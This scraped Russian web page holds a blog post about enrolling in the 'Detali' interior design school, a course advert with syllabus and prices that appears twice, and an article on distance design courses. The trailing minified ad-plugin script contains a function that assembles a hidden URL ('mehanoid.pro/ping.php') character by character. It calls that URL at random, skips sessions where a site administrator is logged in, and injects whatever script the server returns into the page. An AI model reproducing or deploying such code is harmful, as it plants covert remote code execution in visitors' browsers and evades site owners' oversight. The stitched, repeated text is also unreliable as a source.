12 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Дизайн школа детали стоимость обучения

emaltseva

Елена Мальцева

дизайн интерьеров

Школа Детали. Поступление

Совсем редко стала писать в блоге, за это спасибо скажем дачному интернету. Билайн еще кое-как пыхтит, у мужа мегафон вообще отказывается связывать его с всемирной паутиной.

Хочу поделиться моей главной новостью этого лета — я поступила в школу дизайна «Детали». В этом посте я расскажу, почему я выбрала именно эту школу, а также как проходило собеседование.

Про Детали я знала довольно давно, еще когда только появилась программа «Квартирный вопрос» на НТВ, тогда там про каждого дизайнера рассказывали, что он закончил. Но на тот момент я еще не знала, что решусь сменить профессию. Скажем так, я вообще наверное, еще в школе училась или на первых курсах университета. Но название «Детали» в голове отложилось.
Что происходило следующие годы, я помню плохо, но я постоянно интересовалась интерьерами и уже к 2010 году я четко знала, что хочу заниматься дизайном. Я стала искать школы, обучающие дизайну интерьера. К сожалению, на тот момент у меня не было ни финансовой, ни временнОй возможности учиться, поэтому я штудировала журналы. Если мне нравился интерьер, я искала информацию о дизайнере, какое учебное заведение он закончил. В итоге процентов 80 понравившихся мне интерьеров были выполнены выпускниками Деталей. Прошло время. Я успела выйти замуж, родить сына. Уходя в декрет, я понимала, что это мой шанс: были и средства и время. И чуть сын подрос, я, не раздумывая, подала документы. Сразу скажу, что помимо Деталей я рассматривала и другие учебные заведения, но мне не подходила либо длительность обучения, либо работы выпускников не нравились, либо само место. В общем, сложив весь пазл, я остановилась на Деталях.

Кстати, все вышеописанное я и рассказала на собеседовании, отвечая на вопросы типа «Почему дизайн интерьера?» и «Почему именно наша школа».

Важным моментом на собеседовании является обсуждение интерьеров, которые нравятся и не нравятся. Если дизайнер опытный, он может принести свои работы, либо, если нет опыта, то принести фотографии интерьеров из журналов или интернета.

Чтобы показать понравившиеся интерьеры я принесла немецкий журнал Romantisch wohnen. Практически все интерьеры, представленные в этом журнале, в том числе и реклама, мне нравятся))
Сочетание современной классики, натуральных материалов и легкого налета шебби-шика — ммм то, что доктор прописал)).

Продолжая тему современной классики, я показала работы американского декоратора Тоби Фэйрли. Я случайно о ней узнала на сайте houzz.com. Ее интерьеры мне так полюбились — смелые, но уютные — я по ним буквально изучаю, как сочетать цвета и узоры.
Вот несколько ее работ




Вторым симпатичным мне направлением является индустриальный стиль.
Интерьер ниже сочетает в себе утонченность и легкость (белая кухня, подушки на диване) с брутальностью и невероятной энергетикой предметов, явно побывавших на какой-нибудь фабрике (часы, журнальный стол, колонны и ригель, зеркало, станина под столом).



С непривлекательными интерьерами было не все так просто. Хотя бы потому, что я покупаю определенные журналы, в которых сложно найти плохой интерьер. Поэтому я порылась на даче и нашла «Красивые квартиры» лохматого 2006 года. Не буду критиковать интерьеры тех лет, просто скажу, что многоуровневые потолки, множество ниш в стенах, пластиковые низкие плинтусы и т.п. — это немного не мой формат. Не знаю, что публикуется сейчас в этом журнале, но интерьеры в том номере мне не понравились. И точка)))

Само собеседование прошло на очень позитивной волне. Меня собеседовала Анна Сокольская — замдиректора школы. Мы поговорили проблемах современного дизайна, будущем школы и много о чем еще.

В общем я жду не дождусь начала учебы. А для тех, кто только собирается заниматься дизайном, не забывайте про. детали)))

Дизайн школа детали стоимость обучения

Вы хотели бы научиться создавать уникальные интерьерные проекты и работать по необычайно востребованной в настоящее время специальности «дизайнер интерьера»?
Преподаватели курса «Дизайн интерьера» познакомят Вас с историей дизайна, раскроют секреты работы с цветом, светом, деталями в пространстве. Выполнение проектных заданий поможет Вам сформировать основные навыки проектирования квартиры, дома, офиса.

В программе курса обучения дизайну интерьера – композиционные основы проектирования интерьеров, изучение техники безопасности и принципов взаимодействия дизайнера с заказчиком.

Продолжительность курса:

Групповые занятия: 92 ак. ч.
Индивидуальные занятия: 48 ак. ч.

Время занятий групп на курсах:

  • утренние — с 9-00 до 12-00, с 10-00 до 13-00
  • дневные — с 12-00 до 15-00, с 13-00 до 16-00, с 15-00 до 18-00
  • вечерние — с 18-00 до 21-00, 19-00 до 22-00
  • группы выходного дня: суббота и/или воскресенье — c 10-00 до 13-00, с 13-00 до 15-00, с 15-00 до 18-00.

Стоимость курса:

модуль: 11570 руб.
базовая цена: 18140 руб.
индивид. обучение: 37170 руб.

Учебная программа курса: [Показать программу]

1. Предмет художественного конструирования
1.1 История дизайна. Основы современного дизайна, его задачи. Понятие комфорта

2. Стили и направления в искусстве оформления интерьера от Египта до Средневековья

3. История стилей оформления интерьера от Средневековья до Ампира
3.1 Романский стиль
3.2 Готический стиль
3.3 Эпохи Возрождения (Ренессанс)
3.4 Барокко
3.5 Рококо
3.6 Классицизм
3.7 Ампир

4. История стилей и художественных направлений в искусстве оформления интерьера от Ампира до наших дней:
4.1 Эклектика ХIХ в. Модернизм
4.2 Арт Нуво-Модерн
4.3 Кубизм, Авангард, Конструктивизм
4.4 Арт Деко
4.5 Минимализм
4.6 Хай-Тек
4.7 Сонтемпорарн (Современный)
4.8 Постмодернизм
4.9 Этно
4.10 Эклектика ХХ века
4.11 Кантри
4.12 Традиционный

5. Принципы восприятия пространства человеком
5.1 Жилище — как замкнутое пространство
5.2 Составляющие его функции: сна, приема пищи, приготовления пищи, отдыха и т.д.

6. Зависимость восприятия замкнутого пространства от различных факторов

7. Общие принципы планирования и обустройства жилища: Освещенность.
7.1 Естественная инсоляция жилища; ориентация по сторонам света; относительно уровня земли; климатических зон и др.
7.2 Искусственная освещенность: основные принципы – равномерность освещения; достаточность
7.3 Характер выполняемых функций искусственного освещения: общее, локальное, декоративное

8. Светотехника
8.1 Лампы накаливания, галогенные, газоразрядные, ртутные и др.
8.2 Конструктивные типы светильников
8.3 Характеристика светильников по способу распределения света
8.4 Электроустановочное оборудование
8.5 Сенсорное и дистанционное оборудование
8.6 Рекомендации по размещению в интерьере различных видов светильников по их функциональному назначению

9. Цветоведение
9.1 Характеристика и свойства цвета
9.2 Цветовой круг Гете-Освальда
9.3 Цветовые гармонии
9.4 Психологическое воздействие цвета на человека
9.5 Эмоционально-пространственные свойства цветов (сравнительные таблицы)
9.6 Гармонические сочетания элементов интерьера и предметов обустройства жилища

10. Составляющие интерьера помещений

11. Отделочные материалы и оборудование

12. Общие принципы планировки жилища
12.1 Функциональное зонирование
12.2 Коммуникационное зонирование
12.3 Рациональное зонирование
12.4 Принцип эргономики в зонировании

13. Обустройство и реконструкция интерьера помещений: перепланировка и переоборудование с учетом требований соответствующих организаций.
14. Введение в курс создания эскизного проекта оформления интерьера помещения:
14.1 Графика; условные обозначения; масштаб
14.2 План пола, потолка, развертка стен, перспектива и др.
14.3 Составление планировочной части эскизного проекта-плана пола и потолка – с зонированием, расстановкой мебели и оборудования в интерьере
14.4 Оформление проекта
14.5 Способы представления проекта заказчику

15. Особенности оформления интерьеров важнейших помещений: холл, гостиная, столовая, кабинет, детская, спальня, кухня, ванная комната и др.

16. Декорирование интерьера в зависимости от зональной принадлежности
16.1 Подбор мебели, аксессуаров, тканей и материалов
16.2 Ткань в интерьере

17. Зачетное занятие
17.1 Выполнение эскизной части проекта интерьера индивидуально выбранного помещения с пояснительной запиской. Оформление портфолио.

Дизайн интерьера. Проектирование

1. Введение. Программа курса, цель и задачи выполнения проектных заданий

2. Композиционные основы проектирования интерьеров
2.1 Фронтальная композиция
2.2 Объемная композиция
2.3 Объемно-пространственная композиция

3. Работа над проектом
3.1 Сбор исходных данных
3.2 Назначение помещения (здания)
3.3 Местоположение, связь с окружающей застройкой и ландшафтом. Ориентация
3.4 Людские и транспортные потоки
3.5 Требования к температурно-влажностному режиму, естественному и искусственному освещению, цветовому решению, отделочным материалам.
3.6 Расстановка технологического оборудования и мебели, функциональные зоны, планировочное решение помещений, их габариты и пропорции. Нормы проектирования. Инженерные коммуникации
3.7 Особые требования, связанные с особенностями эксплуатации данного здания (помещения)
3.8 Требование техники безопасности

4. Работа с заказчиком
4.1 Составление проекта (первой редакции) задания на проектирование
4.2 Разработка эскизного проекта, обсуждение с заказчиком
4.3 Составление окончательной редакции задания на проектирование с указанием объема графических материалов

5. Разработка проекта (альбома чертежей, пояснительной записки и демонстрационных материалов)

6. Проект запланированного элемента (выставочного или информационного стенда, рекламной витрины магазина и т.п.)

7. Проект стилевого решения интерьера помещений (кабинета руководителя, зала заседаний, читального зала, зала ресторана и т.п.)

8. Проект интерьеров основных помещений всего сооружения (офис, банк, музей, выставка, магазин, ресторан, односемейный жилой дом или квартира и т.п.)

Зачет. Анализ работ.

Как записаться на обучение на курсы:

Для того, чтобы стать нашим слушателем, Вам необходимо подойти в учебный отдел нашего Центра, заключить договор на обучение и оплатить стоимость курса с учетом скидки, которая предоставляется всем посетителям, получившим информацию на этом сайте. По условию договора абитуриент может внести предоплату (50% от стоимости обучения). Вторая часть оплаты вносится до второго занятия обучения.

Дизайн школа детали стоимость обучения

Вы хотели бы научиться создавать уникальные интерьерные проекты и работать по необычайно востребованной в настоящее время специальности «дизайнер интерьера»?
Преподаватели курса «Дизайн интерьера» познакомят Вас с историей дизайна, раскроют секреты работы с цветом, светом, деталями в пространстве. Выполнение проектных заданий поможет Вам сформировать основные навыки проектирования квартиры, дома, офиса.

В программе курса обучения дизайну интерьера – композиционные основы проектирования интерьеров, изучение техники безопасности и принципов взаимодействия дизайнера с заказчиком.

Продолжительность курса:

Групповые занятия: 92 ак. ч.
Индивидуальные занятия: 48 ак. ч.

Время занятий групп на курсах:

  • утренние — с 9-00 до 12-00, с 10-00 до 13-00
  • дневные — с 12-00 до 15-00, с 13-00 до 16-00, с 15-00 до 18-00
  • вечерние — с 18-00 до 21-00, 19-00 до 22-00
  • группы выходного дня: суббота и/или воскресенье — c 10-00 до 13-00, с 13-00 до 15-00, с 15-00 до 18-00.

Стоимость курса:

модуль: 11570 руб.
базовая цена: 18140 руб.
индивид. обучение: 37170 руб.

Учебная программа курса: [Показать программу]

1. Предмет художественного конструирования
1.1 История дизайна. Основы современного дизайна, его задачи. Понятие комфорта

2. Стили и направления в искусстве оформления интерьера от Египта до Средневековья

3. История стилей оформления интерьера от Средневековья до Ампира
3.1 Романский стиль
3.2 Готический стиль
3.3 Эпохи Возрождения (Ренессанс)
3.4 Барокко
3.5 Рококо
3.6 Классицизм
3.7 Ампир

4. История стилей и художественных направлений в искусстве оформления интерьера от Ампира до наших дней:
4.1 Эклектика ХIХ в. Модернизм
4.2 Арт Нуво-Модерн
4.3 Кубизм, Авангард, Конструктивизм
4.4 Арт Деко
4.5 Минимализм
4.6 Хай-Тек
4.7 Сонтемпорарн (Современный)
4.8 Постмодернизм
4.9 Этно
4.10 Эклектика ХХ века
4.11 Кантри
4.12 Традиционный

5. Принципы восприятия пространства человеком
5.1 Жилище — как замкнутое пространство
5.2 Составляющие его функции: сна, приема пищи, приготовления пищи, отдыха и т.д.

6. Зависимость восприятия замкнутого пространства от различных факторов

7. Общие принципы планирования и обустройства жилища: Освещенность.
7.1 Естественная инсоляция жилища; ориентация по сторонам света; относительно уровня земли; климатических зон и др.
7.2 Искусственная освещенность: основные принципы – равномерность освещения; достаточность
7.3 Характер выполняемых функций искусственного освещения: общее, локальное, декоративное

8. Светотехника
8.1 Лампы накаливания, галогенные, газоразрядные, ртутные и др.
8.2 Конструктивные типы светильников
8.3 Характеристика светильников по способу распределения света
8.4 Электроустановочное оборудование
8.5 Сенсорное и дистанционное оборудование
8.6 Рекомендации по размещению в интерьере различных видов светильников по их функциональному назначению

9. Цветоведение
9.1 Характеристика и свойства цвета
9.2 Цветовой круг Гете-Освальда
9.3 Цветовые гармонии
9.4 Психологическое воздействие цвета на человека
9.5 Эмоционально-пространственные свойства цветов (сравнительные таблицы)
9.6 Гармонические сочетания элементов интерьера и предметов обустройства жилища

10. Составляющие интерьера помещений

11. Отделочные материалы и оборудование

12. Общие принципы планировки жилища
12.1 Функциональное зонирование
12.2 Коммуникационное зонирование
12.3 Рациональное зонирование
12.4 Принцип эргономики в зонировании

13. Обустройство и реконструкция интерьера помещений: перепланировка и переоборудование с учетом требований соответствующих организаций.
14. Введение в курс создания эскизного проекта оформления интерьера помещения:
14.1 Графика; условные обозначения; масштаб
14.2 План пола, потолка, развертка стен, перспектива и др.
14.3 Составление планировочной части эскизного проекта-плана пола и потолка – с зонированием, расстановкой мебели и оборудования в интерьере
14.4 Оформление проекта
14.5 Способы представления проекта заказчику

15. Особенности оформления интерьеров важнейших помещений: холл, гостиная, столовая, кабинет, детская, спальня, кухня, ванная комната и др.

16. Декорирование интерьера в зависимости от зональной принадлежности
16.1 Подбор мебели, аксессуаров, тканей и материалов
16.2 Ткань в интерьере

17. Зачетное занятие
17.1 Выполнение эскизной части проекта интерьера индивидуально выбранного помещения с пояснительной запиской. Оформление портфолио.

Дизайн интерьера. Проектирование

1. Введение. Программа курса, цель и задачи выполнения проектных заданий

2. Композиционные основы проектирования интерьеров
2.1 Фронтальная композиция
2.2 Объемная композиция
2.3 Объемно-пространственная композиция

3. Работа над проектом
3.1 Сбор исходных данных
3.2 Назначение помещения (здания)
3.3 Местоположение, связь с окружающей застройкой и ландшафтом. Ориентация
3.4 Людские и транспортные потоки
3.5 Требования к температурно-влажностному режиму, естественному и искусственному освещению, цветовому решению, отделочным материалам.
3.6 Расстановка технологического оборудования и мебели, функциональные зоны, планировочное решение помещений, их габариты и пропорции. Нормы проектирования. Инженерные коммуникации
3.7 Особые требования, связанные с особенностями эксплуатации данного здания (помещения)
3.8 Требование техники безопасности

4. Работа с заказчиком
4.1 Составление проекта (первой редакции) задания на проектирование
4.2 Разработка эскизного проекта, обсуждение с заказчиком
4.3 Составление окончательной редакции задания на проектирование с указанием объема графических материалов

5. Разработка проекта (альбома чертежей, пояснительной записки и демонстрационных материалов)

6. Проект запланированного элемента (выставочного или информационного стенда, рекламной витрины магазина и т.п.)

7. Проект стилевого решения интерьера помещений (кабинета руководителя, зала заседаний, читального зала, зала ресторана и т.п.)

8. Проект интерьеров основных помещений всего сооружения (офис, банк, музей, выставка, магазин, ресторан, односемейный жилой дом или квартира и т.п.)

Зачет. Анализ работ.

Как записаться на обучение на курсы:

Для того, чтобы стать нашим слушателем, Вам необходимо подойти в учебный отдел нашего Центра, заключить договор на обучение и оплатить стоимость курса с учетом скидки, которая предоставляется всем посетителям, получившим информацию на этом сайте. По условию договора абитуриент может внести предоплату (50% от стоимости обучения). Вторая часть оплаты вносится до второго занятия обучения.

Дистанционные курсы дизайна

Профессия дизайнера востребована сегодня как никогда. И, естественно, это отражается на рынке образования. Если чуть больше 10 лет назад заведения, обучающие дизайнеров, можно было пересчитать на пальцах одной руки, то сейчас многообразие учебных заведений и форм обучения просто поражает.

Современные вузы предлагают как традиционные (очные или заочные), так и дистанционные курсы дизайна. А если получение диплома государственного образца для вас необязательно, то возможных вариантов обучения становится в разы больше. Пройти курсы дизайна дистанционно можно как в своей стране, так и за границей, например в Англии или Италии. Да, сегодня это вполне реально и достижимо, благодаря новым технологиям и возможности учиться удаленно.

Где учиться на дизайнера

Дистанционное образование возникло уже несколько десятилетий назад, но стало стремительно развиваться только с появлением сети Интернет. У него есть много бесспорных преимуществ: вы можете учиться самым редким и престижным профессиям в популярных университетах мира, не переезжая и даже не выходя из дома, выбирать удобное время обучения и нужную интенсивность занятий. Причем стоимость онлайн-обучения обычно ниже очного, не считая экономии на проживании за рубежом.

Факультеты в вузах

Профессию дизайнера можно получить как в профильных вузах, так и в строительных, где есть дизайнерские факультеты. Рассмотрим преимущества и недостатки такого обучения.

Плюсы:

  • обучение на государственной основе;
  • полноценный курс с дипломом о высшем образовании на выходе;
  • освоение всех необходимых навыков в полном объеме;

Минусы:

  • довольно большая нагрузка;
  • длительность учебы (5-6 лет);
  • экзамены при поступлении, и большой конкурс (слишком много абитуриентов претендует на 1 место).

Профессиональные курсы

Но не обязательно учиться в вузе для того, чтобы получить работу дизайнера. Можно также закончить очные или дистанционные курсы дизайна.

Онлайн курсы бывают самых разных видов: от простых ознакомительных до вполне серьезных с именитыми преподавателями и получением углубленных знаний. Здесь тоже есть свои положительные и отрицательные стороны.

Плюсы:

  • пройдя качественный дистанционный курс, вполне реально сформировать все необходимые профессиональные навыки;
  • обучение «умещается» в небольшие сроки (от 5-6 месяцев до года);
  • для сомневающихся в выборе профессии есть возможность без больших затрат проверить, насколько это «ваша» сфера деятельности.

Минусы:

  • отсутствие диплома государственного образца;
  • платное обучение;
  • очень сжатая программа.

По окончании учебы студент получает сертификат о прохождении курса, который не является дипломом о высшем образовании.

Конечно, если ваша цель – связать жизнь с работой в дизайнерской сфере, но никаких знаний в этой области нет, стоит окончить высшее учебное заведение. Но и слушатель курсов, при условии усердной работы и хорошей мотивации, опираясь на качественно заложенную базу, может самостоятельно углубить свои знания и также стать прекрасным востребованным специалистом.

Дизайнер дизайнеру рознь

Прежде, чем выбирать вуз, нужно определиться с конкретным направлением, которым вы хотите заниматься. Ведь каждое направление (к примеру, дизайн одежды, интерьера или ландшафта) – это отдельная профессия.

На занятиях будущие дизайнеры:

  • получают навыки рисования, черчения и проектирования,
  • осваивают необходимые для работы Интернет-технологии и компьютерные программы (Illustrator, QuarkXPress, CorelDraw, Photoshop),
  • овладевают другими специальными знаниями, необходимыми для своей специализации.

Давайте более подробно рассмотрим несколько разных профессий.

Графический дизайн в онлайн режиме

Графический дизайнер – это художник-проектировщик, который занимается разработкой рекламных буклетов, придумывает уникальный корпоративный стиль организации: создает логотип, выбирает цветовую гамму, шрифт и размер надписи названия компании. Обычно он сотрудничает с редакциями, издательствами и рекламными агентствами. Прежде, чем выбрать курс «Графический дизайн» , убедитесь, что умеете рисовать от руки и знакомы с базовыми компьютерными программами.

Дистанционные курсы дизайна интерьера

В Интернете сейчас очень много советов по выбору интерьера, а гипермаркеты предлагают огромный выбор мебели и декора на любой вкус. Тем не менее, собрать все воедино, подобрать функциональные вещи со вкусом получается далеко не у всех. Поэтому многие люди предпочитают положиться на специалиста в деле качественного обновления своего дома или офиса. Слушатели курса научатся полностью оформлять помещение – создавать чертежи и эскизы будущего интерьера, подбирать цветовую гамму, мебель и детали декора, делать перепланировку. Важно уметь рисовать, грамотно сочетать цвета, мыслить творчески.

Дистанционные курсы ландшафтного дизайна

Ландшафтный дизайнер – специалист садового искусства, способный превратить любой неухоженный участок в опрятный «райский уголок», радующий глаз. Это дано далеко не каждому. Нужно хорошо разбираться в растениях, уметь правильно ухаживать за ними и сочетать между собой. Студенту необходимо стать немного архитектором и немного строителем, чтобы грамотно спроектировать будущий зеленый оазис и дополнить его камнями, ограждением, небольшим фонтаном или прудиком.

Дистанционное обучение веб-дизайну

Веб-дизайнер – это профессия уже не будущего, а настоящего. Она предполагает разработку интерфейсов для различных сайтов. Специалисты этой области делают страницы сайтов удобными и максимально полезными пользователям. Для учебы, естественно, пригодятся базовые знания современных компьютерных программ, основ программирования и компьютерной графики. Умение постоянно совершенствоваться и следовать современным тенденциям будут также отличными качествами для освоения сферы.

На сегодняшний день существует много онлайн уроков и обучающих пособий по программированию. Во многом можно разобраться самостоятельно, пользуясь бесплатными ресурсами и руководствами. Но специальное очное или дистанционное образование под руководством грамотных преподавателей никогда не будет лишним.

Одна из самых творческих профессий

Без сомнения, всем кто решил освоить эту специальность, необходимо иметь талант и креативное мышление. Но, чтобы стать настоящим мастером своего дела, нужно получить профильное образование.

Популярность этого занятия объясняется и его творческой составляющей, что во все времена нравилось людям. Хотя очень многим не помешало бы снять розовые очки и взглянуть на работу дизайнера с правильного ракурса, учитывая все нюансы профессии.

Полученный диплом – это всего лишь начало пути. Выйти на действительно высокий уровень профессионализма и хорошо зарекомендовать себя – значит, усердно трудиться, ответственно относиться к работе, постоянно совершенствоваться, мыслить творчески, изо дня в день изобретать что-то красивое, уникальное, полезное, функциональное, и делать это высококлассно.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика